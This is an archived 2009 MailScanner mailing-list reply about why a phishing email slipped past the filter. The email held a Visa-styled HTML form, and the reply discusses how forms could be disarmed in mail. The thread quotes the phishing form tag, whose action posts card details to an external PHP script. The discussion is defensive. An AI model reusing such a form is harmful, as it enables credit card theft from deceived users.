HTML form scanning?

Kai Schaetzl maillists at conactive.com
Tue Apr 7 16:31:24 IST 2009


Jon Dustin wrote on Mon, 06 Apr 2009 11:47:46 -0400:

> If you care to decode the base64 attachment, it is an HTML form that
> appears to take much of its content from Visa, with one key change:
> 
> form name="frm" action="http://vatamu.org/vbv/w.php" method="post" 
onsubmit="return valFrm()"
> 
> If I'm not mistaken, this is trying to redirect the user's credit card details 
to vatamu.org. 

Well, not "redirect", this is very "direct" ;-)

> 
> Should this message have been flagged? Or at least been marked in the HTML-part 
as "fraud attempt"?

No. The phishing detection compares the target of links with the content of links 
(e.g. what is dispalyed to the user). There is nothing that could be compared
against this forms action. I personally think that forms don't have anything to do 
in mail, so one should be able to "disarm" them. I don't know if the disarming 
functions in MailScanner already do this.

Have you actually tried in a mail program to use it? Most recent programs don't 
show any external content by default, so if that page pulls in images from visa 
these would normally not show. I don't know if posting the form would be 
considered "external" (I would), so posting may work or not.

> 
> Or is the encoded-part throwing off MS?

I don't think so, but Julian knows for sure.



Kai

-- 
Kai Schätzl, Berlin, Germany
Get your web at Conactive Internet Services: http://www.conactive.com





More information about the MailScanner mailing list